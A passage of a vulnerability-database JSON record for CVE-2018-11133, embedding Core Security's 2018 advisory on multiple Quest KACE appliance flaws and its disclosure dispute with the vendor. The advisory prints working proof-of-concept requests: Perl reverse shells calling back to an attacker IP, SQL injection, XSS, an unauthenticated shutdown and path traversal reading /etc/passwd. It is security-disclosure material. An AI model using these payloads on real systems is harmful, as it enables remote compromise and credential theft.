"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-11133",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11133",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-15640",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1221",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-11133",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. 
*Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. 
\n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. 
\n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. 
\n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. 
\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). 
\n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. 
*Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 
8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. 
\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. 
*Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . 
\ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel, also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core for its reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. 
Finally, Quest\u0027s KACE\nPM notified that the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered the email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involve\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked Quest for the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess, and communicated the next steps of the process including: 1. 
Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers\u0027 names and the URL of the advisory where\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked for the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. 
This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11133",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15640",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11133",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"id": "VAR-201805-0593",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
}
]
},
"last_update_date": "2023-12-18T12:01:57.613000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestKACESystemManagementAppliance Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137665"
},
{
"title": "Quest KACE System Management Appliance Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81233"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.8,
